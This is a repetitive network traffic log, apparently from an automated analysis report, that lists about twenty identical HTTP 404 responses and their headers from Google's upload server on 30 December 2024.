                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Cy3AGllTAKo31nhVbw7zqsunY3CNSXYX97cBzLD76JYmjgc70HlC3G6gbHzcE5zuikGGz16IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:17 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UzVx6tpCgm61b0isduHATQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5uMXZaWKo8OSbt-Gufc0vAw4CjyATnzNdoVOuV5MxEIAzOarak5NFrLhV1uwfqAKSLWQXBaO4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:19 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-anw75W2Z8RTAExN_miqBKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7nq3ie3sCGiqAw6NBRXuADWysTFG4vtjmkwPjav_8PJwv5TtZvxIGM9bVk2o9THE73OM_7BsQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EP0hyBAuVZ_T3BJkXo8IqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56cKeQm4BOcXEY4uZL58k4wMgbKVPNtAYUaqP45QFbEGoU7PQ7JyPSLEXpu3yUEinhTj3qh5gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-T31ncOEkBRHxaV7vhxfjuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7t4IjvbaMkTWaJc_jn8pG3XhnnjStaLLV_yWRIynjVbHCQEhAaohIlN7PC6q_WoGgUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0zrqcvvWIOCk9LBLBlO8Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6C_HpLn0ifJlg5HdiyY8OGu-Dna7QaV_QXzTjNm-8XM8aiF1ZKxEIVV2WXnLdiIA73Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-f3QdbNMcWNKHGrz8nEYfiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZUhcsjEytEFHWrG3I0SdpxD0KO-40Cc7SRMLcpzLGzODKCS7p60GbJfckwSAlpWANXNoXtRcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-lGIG7fO2dqmaWCC0lF13cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WM7Hae0nWn28ohK6_l7PPfgLiFuBp4fLO4YgQgLCx5gO2D20h4C-0BfvLOWKRnyDiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-XXLu693lqBJwszJBuR606w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42U7NeHeFEeUozfXoOpuK3ch8O996UDbnt9ABbknjUy-Xwup_fDByBMzqBaIUi57xeE6MZv-0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vu6-CYJq0P4K0K2zFZJ82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7NKr3rOUZ5PV0WHzbq-Yjpg8ODmdzf2lAMcwsqR8jHZEC81RsYuccd4olCf1fERXjyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:25 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tCMGV9BrQYBhoDwkSkef2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC52p6EgAv7eVuWBDy83xgMIMCWNQTEvA4Rt6o4of_Iaa_wWXy-ItXi0o1016LrCR2DlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-PaYn2esPOg2oPD55cvDejg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Pnzw6IC7dQs6vccov--bdohDXjI6ahqHo4iIAECQWQDH7SsAryJ2e9JOZtoQMKM7tywkr_7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zzya00Vx86yFFFlw9_LHng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5xbHscZhjUAC5j9kAMvQaUCXa-3yfOu7RaoYqljKYV8knjX56L1UvKEB0C5Fc9Tu4Pc4Tj0sgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Z6jKdYZQNpTihdvOzfobAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53D40FV8zy2Uy0FzXv9g0PLku9ZgXhSCoSOwYRHj6iQ0S7pzTcBVIUnucULY9BCseABGfGTAAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-3a8-nsDvDMxdsNONszcB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67v4XwYxb7u-am1A_nmiXu2EM7sj2zO7nRCCeAz-dA7dtypUC-chXR4tOjjr5YEe6q1ODh6ZQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yj_i6Y5hG_eWK2l_ZPiUfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7G726QDmTYQMO3q9MSuerIbwfTO9Hl74vBRJVaUUN86zt8mb-ywPAce78x2T0RjPm4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:30 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ga9R7AHblNJFnJ1BhWw0Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qRgu0OBmV649NRheTdxp1c7CZxKLs9ShCrSLyizh0rNK2IEjHV1_v1tIigC3VSbvCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MsE6aHpBxO2S3j0qbQiqIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7t0WD-bpPbivLYDUpzxuLMsvMCOYihjejscmkEaQcdN8OatQACHG-1eDbV8pL7RzBceCgvVg0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PL36cXIvHzcvqTRvFaVzrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6eLmT1qhSR7aKdwAqkyVNEciZxcL5P_SWOy0LNYQoji3sXccAL8p2Kr8DoeAM39O4LContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6UlqBSHfNZDUIY2AG_ls9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5IOqhIUp7Uw-16rJzbrIGZv2vQfEjG3ZHBKwUSHGRqzeeH8YdlkFja2ybPbJNrsBBYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-S8MsMFEcalqjWn9HWJ5rQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
